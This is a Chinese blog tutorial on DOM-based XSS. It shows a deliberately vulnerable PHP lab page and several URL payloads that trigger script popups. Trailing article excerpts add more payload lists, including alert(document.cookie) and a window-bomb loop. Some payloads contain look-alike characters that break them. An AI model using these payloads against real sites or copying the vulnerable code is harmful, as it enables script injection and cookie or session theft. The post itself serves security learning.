Dom型xss讲解 一次弹窗&二次弹窗

最新推荐文章于 2024-04-24 23:55:02 发布
最新推荐文章于 2024-04-24 23:55:02 发布
阅读量681 收藏 1
点赞数
分类专栏: Hacker Way
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45650712/article/details/107884959
版权

Dom型xss讲解 一次弹窗&二次弹窗

Dom型xss讲解
Dom型 ==》 前端 反射型的一种(利用dom标签)
dom_xss.php

<?
phperror_reporting(0);
$name = $_GET["name"];
?>
<input id="text" type="text" value="<?php echo ($name);?>" />
<div id="print"></div>
<script type="text/javascript" src="http://192.168.1.105:800/xsszhuanxiang/DOM/HtmlUtil.js"/></script>
<script type="text/javascript">var text = document.getElementById("text"); 
var print = document.getElementById("print");
print.innerHTML = HtmlUtil.htmlEncode(text.value);
 // 获取 text的值,并且输出在print内。这里是导致xss的主要原因。
 </script>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

http://192.168.1.105:800/xsszhuanxiang/DOM/dom_XSS.php?name=<script>alert(1)</script>

在这里插入图片描述

http://192.168.1.105:800/xsszhuanxiang/DOM/dom_XSS.php?name="><img src=x οnerrοr=prompt(1);>

在这里插入图片描述

http://192.168.1.105:800/xsszhuanxiang/DOM/dom_XSS.php?name=<img src=x οnerrοr=prompt(1);>

在这里插入图片描述
在这里插入图片描述

http://192.168.1.105:800/xsszhuanxiang/DOM/dom_XSS.php?name="><img src=1 οnerrοr=alert(1)><input type="hidden

在这里插入图片描述
实现俩种方式插入语句:

http://192.168.1.105:800/xsszhuanxiang/DOM/dom_XSS.php
?name=1111<img src=x onerror=prompt(1);>"><img src=x οnerrοr=prompt(1);><"

在这里插入图片描述
在这里插入图片描述

xss语句:https://www.cnblogs.com/xuehen/p/4814237.html

在这里插入图片描述
后续操作请持续关注哦!!!
了解更多请关注下列公众号:
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗
在这里插入图片描述
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗

永不垂头
关注
专栏目录
[网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结(二)
杨秀璋的专栏
05-18 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了肖老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些天分享了很多系统安全和软件安全的知识,接下来让我们回归网络安全,做做XSS跨站脚本攻击案例。这些题目来自Fox好友,在此感谢他。主要内容包括XSS原理、不同类XSSXSS靶场9道题目、如何防御XSS。希望您喜欢~
[Web安全] xss&CSRF漏洞初探
qq_42551635的博客
09-06 791
[Web安全] xss&CSRF漏洞初探 正文|xss简介 现代网站往往会包含大量的动态内容,动态内容是指web应用程序根据用户环境和需要来输出相关内容。跨站脚本攻击(cross site scripting)是一种针对网站应用程序的安全漏洞利用技术,是代码注入漏洞的一种,它使得攻击者可以通过巧妙地方法向网页中注入恶意代码,用户浏览器在加载网页、渲染html文档时就会执行攻击者的恶意代码,攻击成功后,攻击者可能得到很高的权限,获取私密网页内容、会话、cookie等敏感信息。XSS可以理解为在用户
XSS弹窗炸弹
墨鱼菜鸡
09-10 734
目录 xss平台使用 创建模板-boom 创建项目-boom 配置弹窗代码 查看项目代码 键入代码 生成短链接 python弹窗炸弹代码 xss平台使用 创建模板-boom function WindowBomb() { var iCounter = 0 //dummy counter while(true) { windo...
xss弹窗
hxxjxw的博客
12-17 6664
xss.php 能实现一个简单弹窗 &lt;html&gt; &lt;head&gt; xss test&lt;/head&gt; &lt;body&gt; &lt;script&gt; alert("xss")&lt;/script&gt; &lt;meta http-equiv="refresh" content="0;"&
XSS弹窗专项练习
m0_53743276的博客
02-10 929
XSS练习
xss靶机训练【实现弹窗即成功】
Miracle_ze的博客
07-29 3885
xss的绕过
细说XSS
LainWith的博客
08-24 2034
什么是XSS 跨站脚本(Cross-Site Scripting,XSS)是一种经常出现在Web应用程序中的计算机安全漏洞,是由于Web应用程序对用户的输入过滤不足而产生的。攻击者利用网站漏洞把恶意的脚本代码(通常包括HTML代码和客户端Javascript脚本)注入到网页之中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害用户可能采取Cookie资料窃取、会话劫持、钓鱼欺骗等各种攻击。 通常情况下,我们既可以把跨站脚本理解成一种Web安全漏洞,也可以理解成一种攻击手段。 XSS跨站脚本攻击本身
XSS漏洞讲解与多篇实战讲解
浪子燕青的博客
02-25 3449
跨站脚本攻击 XSS攻击基础 概述 个人对XSS攻击的原理认知: 原理:对可以控制传参的位置,比如url链接中,输入框中,首先闭合输出参数位置前后网页标签,在闭合的中间加上JavaScript代码或者其他的html标签,使得网页能够执行你添加的参数功能。 危害:凡是js能做的,大部分xss漏洞都能利用,常见的比如获取当前cookie,获取浏览器保存的账号密码 、获取屏幕截图,获取页面的数据,改变页面的逻辑,向服务器发送数据请求等。 情景:在挖洞的情景下,只要保证能弹个窗,或者执行js代码即可。但是
【干货】XSS知识总结
hackzkaq的博客
10-27 6702
XSS基础 跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至
DVWA - XSS DOM (medium)
qq_42630215的博客
06-04 534
随便在选项里选一个,url中会出现我们选的哪个。 看看可不可以用<script>alert(document.cookie)</script> 127.0.0.1/DVWA-master/vulnerabilities/xss_d/?default=<script>alert(document.cookie)</script> 发现不会执行,而且语句也没有在url中显示,只显示English应该是过滤了方法一 换一个试一下<img src=1 one
用js生成dom并实现弹出层效果
07-31
NULL 博文链接:https://hongtanke.iteye.com/blog/1051579
JavaScript DOM初体验 点击按钮弹窗
weixin_30739595的博客
07-18 216
1 <!DOCTYPE html> 2 <html lang="en"> 3 <head> 4 <meta charset="UTF-8"> 5 <title></title> 6 7 </head> 8 <body> 9 <input ty...
XSS绕过(弹窗拿flag)
qq_48550824的博客
08-05 585
XSS简介及绕过方法介绍
XSS测试语句大全
HackCode的专栏
07-25 1435
 >alert(document.cookie) =>script>alert(document.cookie)/script> script>alert(document.cookie)/script> script>alert(vulnerable)/script> %3Cscript%3Ealert(XSS)%3C/script%3E script>alert(XSS
五种xss弹窗方式
热门推荐
火柴人的博客
07-20 1万+
1.alert() alert(‘xss’) alert(“xss”) alert(/xss/) alert(document.cookie) 2.confirm() confirm(‘xss’) confirm(“xss”) confirm(/xss/) confirm(document.cookie) 3.prompt() prompt(‘xss’) prompt(...
web安全-xss弹弹弹
先剃度再出家
01-22 3343
xss的filter绕过一、xss原理和分类1、xss原理2、xss分类(1)反射性xss(2)存储XSS二、XSS漏洞的危害三、xss漏洞的测试1、黑盒测试2、白盒测试四、XSS的各种bypass技巧五、常用的标签以及个人学习心得1、常用标签2、学习心得七、开源网站的xss复现1、appcms2、wordpress 一、xss原理和分类 1、xss原理     跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS
koa2 实现dom xss 以及 允许浏览器XSS弹窗
zxのdream
08-07 901
koa2 写的dom xss
XSS语句大全
最新发布
ch_ycc的博客
04-24 1928
10、t_sort="type="button" onfocus="alert(1) onfocus-当窗口获得焦点时运行脚本。13、Cookies传 user=" onclick="alert(1)" type="text"12、User agent传 "type="button" onclick="alert(1)11、Referer传" type="button" onclick="alert(1)转化为实体字符: javascript:alert('xss')
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值